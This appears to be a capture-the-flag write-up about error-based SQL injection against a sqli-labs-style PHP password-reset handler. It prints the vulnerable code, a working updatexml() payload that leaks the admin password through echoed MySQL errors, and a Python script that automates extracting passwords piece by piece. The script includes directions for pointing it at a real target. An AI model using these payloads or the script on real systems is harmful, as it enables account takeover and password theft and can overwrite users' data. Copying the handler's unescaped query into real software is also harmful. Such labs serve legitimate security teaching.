SQLi -- POST-Update Query -Error Based -String
in PENETRATIONCTF with 0 comment

<?php
// Password-reset handler that the writeup targets (sqli-labs style, PHP 5 mysql_* API).
// How $uname and $passwd are filled is not shown on the page; assumed here:
// uname is quoted and escaped before the SELECT, passwd is taken from the form raw.
$uname  = "'" . mysql_real_escape_string($_POST['uname']) . "'";
$passwd = $_POST['passwd'];

@$sql = "SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";

$result = mysql_query($sql);
$row = mysql_fetch_array($result);
//echo $row;

if ($row)
{
    //echo '<font color= "#0000ff">';
    $row1 = $row['username'];
    //echo 'Your Login name:'. $row1;
    // $passwd is concatenated straight into the statement: this is the injection point.
    $update = "UPDATE users SET password = '$passwd' WHERE username='$row1'";
    mysql_query($update);
    echo "<br>";

    // The MySQL error text is printed back to the user, which is what the
    // error-based payload relies on.
    if (mysql_error())
    {
        echo '<font color= "#FFFF00" size = "3">'."<br>";
        print_r(mysql_error());
        //echo $update."<br>";
        echo "<br><br>";
        echo "</font>";
    }
    else
    {
        echo '<font color= "#FFFF00" size = "3">'."<br>";
        //echo "Your password has been successfully updated";
        echo $update."<br>";
        echo "<br>";
        echo "</font>";
    }

    echo '<img src="../images/flag1.jpg" />'."<br>";
    echo $update."<br>";
    //echo 'Your Password:' .$row['password'];
    echo "</font>";
}
?>

The code above changes the password with an UPDATE statement. The passwd field is concatenated into that UPDATE without any escaping, and because the page prints mysql_error() back to the user, an error-based injection (updatexml()) can carry query results out in the error message.

First, the final payload:

uname=admin&passwd=a' or updatexml(1,concat(0x7e,(select password from (select password from users where username='admin') hack),0x7e),1)#

uname has to be an existing user so that the SELECT returns a row and the UPDATE is actually executed. The injected passwd closes the string, and the trailing # comments out the rest of the statement, including the WHERE clause. updatexml() throws "XPATH syntax error: '~...~'" when its second argument is not valid XPath, and since the page echoes mysql_error(), the admin password shows up between the two ~ markers (0x7e). The password subquery is wrapped in a derived table with the alias hack because MySQL does not let an UPDATE read from the table it is updating in a plain subquery (error 1093, "You can't specify target table 'users' for update in FROM clause"); the extra select materialises it as a temporary table, which is allowed. Two caveats: the XPATH error message shows at most 32 characters, so longer values have to be read in pieces with substr(), and because # strips the WHERE clause, the UPDATE would touch every row if updatexml() ever returned without raising an error (for example when the subquery yields NULL).
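As an added example (not part of the original writeup), the following Python helper automates the extraction described above: it builds the passwd payload for a given substr() window, parses the leaked slice out of the echoed mysql_error(), and walks the whole password 30 characters at a time, stopping when a window comes back short. It also shows a variant of the payload that keeps the WHERE clause instead of commenting it out. The users, passwords and the fake_target() function are constructed stand-ins for the vulnerable page so that the script runs offline; against a real target, replace fake_target with a function that POSTs uname and passwd and returns the response body.

```python
"""Automates the error-based leak from the UPDATE injection above.

Added example, not code from the original writeup. Assumes the page shown
above: POST fields uname and passwd, passwd concatenated raw into the UPDATE,
and mysql_error() echoed into the HTML.
"""
import re
from typing import Callable, Optional

# MySQL puts at most 32 characters of the offending XPath string into the
# "XPATH syntax error: '...'" message; two of them are the 0x7e ('~') markers,
# so one request leaks at most 30 characters of the value.
WINDOW = 30


def build_payload(target_user: str, start: int, length: int = WINDOW,
                  keep_where: bool = True) -> str:
    """passwd value that makes updatexml() fail with substr(password, start, length)."""
    # The inner SELECT is wrapped in a derived table (alias 'hack') because MySQL
    # refuses a subquery that reads the table being updated (error 1093).
    leak = (f"(select substr(password,{start},{length}) from "
            f"(select password from users where username='{target_user}') hack)")
    head = f"a' or updatexml(1,concat(0x7e,{leak},0x7e),1)"
    # '#' (as in the writeup) comments out the WHERE clause; should updatexml()
    # ever return NULL instead of raising, the UPDATE would then rewrite every
    # row.  "or '" closes the string instead and leaves the WHERE clause intact.
    return head + (" or '" if keep_where else "#")


XPATH_ERR = re.compile(r"XPATH syntax error: '~([^']*?)~'")


def parse_leak(html: str) -> Optional[str]:
    """Return the slice between the ~ markers of an echoed mysql_error(), else None."""
    m = XPATH_ERR.search(html)
    return m.group(1) if m else None


def extract_password(target_user: str, send: Callable[[str, str], str],
                     login_user: str = "admin", max_len: int = 300) -> str:
    """Slide the substr() window until a short (or empty) slice ends the value.

    send(uname, passwd) must POST the two fields and return the response body;
    login_user must exist, or the SELECT returns no row and the UPDATE never runs.
    """
    out, start = "", 1
    while len(out) < max_len:
        chunk = parse_leak(send(login_user, build_payload(target_user, start)))
        if chunk is None:
            raise RuntimeError("no XPATH error in response: unknown user, or "
                               "mysql_error() is not echoed")
        out += chunk
        if len(chunk) < WINDOW:      # last window, possibly empty
            break
        start += WINDOW
    return out


# ---- constructed stand-in for the vulnerable page, so this runs offline ----
FAKE_USERS = {                      # hypothetical users table
    "admin": "admin",
    "carol": "0123456789" * 3,      # exactly one window long
    "dave": "x" * 45,               # needs two windows
}
_SUBSTR = re.compile(r"substr\(password,(\d+),(\d+)\) from \(select password "
                     r"from users where username='([^']*)'\)")


def fake_target(uname: str, passwd: str) -> str:
    """Emulate the handler above for payloads produced by build_payload()."""
    if uname not in FAKE_USERS:     # SELECT finds no row: UPDATE is skipped
        return "<br>"
    echo = f"UPDATE users SET password = '{passwd}' WHERE username='{uname}'<br>"
    m = _SUBSTR.search(passwd)
    if not m:
        return echo
    start, length, who = int(m.group(1)), int(m.group(2)), m.group(3)
    if who not in FAKE_USERS:       # subquery is NULL: updatexml() does not raise
        return echo
    piece = FAKE_USERS[who][start - 1:start - 1 + length]
    return f"XPATH syntax error: '~{piece}~'<br>"


if __name__ == "__main__":
    for user in FAKE_USERS:
        print(user, extract_password(user, fake_target))
```

The stop condition is the window length, not the content: a slice shorter than 30 characters (including an empty one when the password is an exact multiple of 30) means the value is exhausted. A response without an XPATH error is treated as a failure rather than as an empty password, because that is exactly the case in which the UPDATE has gone through.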

